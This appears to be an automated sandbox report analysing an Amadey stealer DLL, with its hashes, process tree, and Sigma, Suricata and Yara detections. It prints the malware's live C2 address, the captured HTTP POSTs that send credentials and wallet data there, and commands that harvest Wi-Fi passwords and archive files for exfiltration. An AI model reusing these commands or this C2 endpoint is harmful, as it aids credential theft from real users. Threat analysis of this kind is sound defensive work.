Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0j6nSbUQQS.dll

Overview

General Information

Sample name:0j6nSbUQQS.dll
renamed because original name is a hash value
Original sample name:921b0badeaffee860310e6755769337e.dll
Analysis ID:1543325
MD5:921b0badeaffee860310e6755769337e
SHA1:cfe2dfe5f457383e1723e4423e78620cc9fa8f91
SHA256:c9914b4ab252e782b73ab0a3efad386444ba8a8059167adcb0675968da2df36f
Tags:32Amadeydllexe
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Uses netsh to modify the Windows network and firewall settings
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6924 cmdline: loaddll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7072 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7108 cmdline: rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • netsh.exe (PID: 6276 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1184 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7116 cmdline: rundll32.exe C:\Users\user\Desktop\0j6nSbUQQS.dll,Main MD5: 889B99C52A60DD49227C5E485A016679)
      • netsh.exe (PID: 5020 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • conhost.exe (PID: 3736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2308 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 6880 cmdline: rundll32.exe C:\Users\user\Desktop\0j6nSbUQQS.dll,Save MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7220 cmdline: rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",Main MD5: 889B99C52A60DD49227C5E485A016679)
      • netsh.exe (PID: 7252 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7348 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7228 cmdline: rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",Save MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "185.215.113.217/CoreOPT/index.php", "Version": "5.03"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
0j6nSbUQQS.dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Suspicious Script Execution From Temp Folder
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7108, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 1184, ProcessName: powershell.exe
    Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7108, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 1184, ProcessName: powershell.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7108, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 1184, ProcessName: powershell.exe

    Stealing of Sensitive Information

    barindex
    Sigma detected: Capture Wi-Fi password
    Source: Process startedAuthor: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7108, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 6276, ProcessName: netsh.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-27T17:47:06.264568+010028552391A Network Trojan was detected192.168.2.449731185.215.113.21780TCP
    2024-10-27T17:47:06.286598+010028552391A Network Trojan was detected192.168.2.449730185.215.113.21780TCP
    2024-10-27T17:47:12.415664+010028552391A Network Trojan was detected192.168.2.449732185.215.113.21780TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Found malware configuration
    Source: 0j6nSbUQQS.dllMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.217/CoreOPT/index.php", "Version": "5.03"}
    Multi AV Scanner detection for submitted file
    Source: 0j6nSbUQQS.dllReversingLabs: Detection: 55%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 81.7% probability
    Source: 0j6nSbUQQS.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
    Source: 0j6nSbUQQS.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: e.pdb source: powershell.exe, 00000012.00000002.1993610573.000002377BB2B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: embly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000009.00000002.1903288280.00000196A60C4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: softy.pdbatt source: powershell.exe, 00000009.00000002.1890847060.00000196A5E87000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000012.00000002.1995221099.000002377BB7E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.1903698906.00000196A60FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900494001.00000196A6056000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 000114})peration: (:) [New-Object], MethodInvocationException.pdb source: powershell.exe, 00000009.00000002.1790967706.000001968EF02000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb1(0&0 source: powershell.exe, 00000009.00000002.1900494001.00000196A6056000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbgeName source: powershell.exe, 00000009.00000002.1901080477.00000196A6090000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1899993710.00000196A6050000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1890847060.00000196A5E87000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ion.pdb source: powershell.exe, 00000012.00000002.1993610573.000002377BB0A000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 6?t.Automation.pdb source: powershell.exe, 00000009.00000002.1901080477.00000196A6090000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbat source: powershell.exe, 00000009.00000002.1890847060.00000196A5E87000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32z source: powershell.exe, 00000012.00000002.1993610573.000002377BB2B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbment.Automation.pdb source: powershell.exe, 00000012.00000002.1993610573.000002377BB2B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: b.pdb source: powershell.exe, 00000009.00000002.1901080477.00000196A6090000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb5 source: powershell.exe, 00000009.00000002.1900494001.00000196A6056000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ion.pdb% source: powershell.exe, 00000012.00000002.1993610573.000002377BB0A000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: re.pdb source: powershell.exe, 00000012.00000002.1979319690.0000023779949000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Target.pdbShell\vg' source: powershell.exe, 00000012.00000002.1995221099.000002377BB7E000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\Music\desktop.iniJump to behavior

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49731 -> 185.215.113.217:80
    Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49732 -> 185.215.113.217:80
    Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49730 -> 185.215.113.217:80
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.215.113.217 80Jump to behavior
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorIPs: 185.215.113.217
    Source: global trafficHTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.217Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: global trafficHTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.217Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: global trafficHTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.217Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: global trafficHTTP traffic detected: POST /CoreOPT/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MzA4MQ==Host: 185.215.113.217Content-Length: 3241Cache-Control: no-cache
    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownHTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.217Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: rundll32.exe, 00000003.00000002.1924040267.0000000002D08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/
    Source: rundll32.exe, 00000003.00000002.1924040267.0000000002D08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/%
    Source: rundll32.exe, 00000003.00000002.1924040267.0000000002CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/Contacts
    Source: rundll32.exe, 00000003.00000002.1924040267.0000000002C5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1933821234.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2006335358.0000000002AF8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2006335358.0000000002A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.php
    Source: rundll32.exe, 00000003.00000002.1924040267.0000000002CD7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1924040267.0000000002D08000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1924040267.0000000002CF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.php?wal=1
    Source: rundll32.exe, 00000003.00000002.1924040267.0000000002CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.php?wal=1.
    Source: rundll32.exe, 00000003.00000002.1924040267.0000000002CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.php?wal=1K
    Source: rundll32.exe, 00000003.00000002.1924040267.0000000002C5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.phph
    Source: powershell.exe, 00000012.00000002.1993610573.000002377BB2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mR
    Source: powershell.exe, 00000012.00000002.1993610573.000002377BB2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mU
    Source: powershell.exe, 00000009.00000002.1790967706.000001968F774000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1789459396.00000272D16D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1854168483.00000272DFE72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1971273343.0000023710072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1840708618.00000237018D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000012.00000002.1840708618.0000023700228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000009.00000002.1790967706.000001968DFD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1789459396.00000272D0028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1840708618.0000023700228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000009.00000002.1790967706.000001968DDC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1789459396.00000272CFE01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1840708618.0000023700001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000009.00000002.1790967706.000001968DFD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1789459396.00000272D0028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1840708618.0000023700228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000012.00000002.1840708618.0000023700228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000009.00000002.1790967706.000001968DDC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1789459396.00000272CFE01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1840708618.0000023700001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000012.00000002.1840708618.0000023701131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1840708618.0000023701312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
    Source: powershell.exe, 00000009.00000002.1790967706.000001968F3DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1789459396.00000272D12AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1840708618.000002370162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
    Source: powershell.exe, 00000012.00000002.1840708618.00000237018D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000012.00000002.1840708618.00000237018D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000012.00000002.1840708618.00000237018D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000012.00000002.1840708618.0000023700228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000009.00000002.1890847060.00000196A5E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
    Source: powershell.exe, 00000009.00000002.1790967706.000001968F774000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1789459396.00000272D16D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1854168483.00000272DFE72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1971273343.0000023710072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1840708618.00000237018D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: 0j6nSbUQQS.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
    Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winDLL@32/18@0/1
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5416:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3736:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_03
    Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\_Files_\NWTVCDUMOB.docxJump to behavior
    Source: 0j6nSbUQQS.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
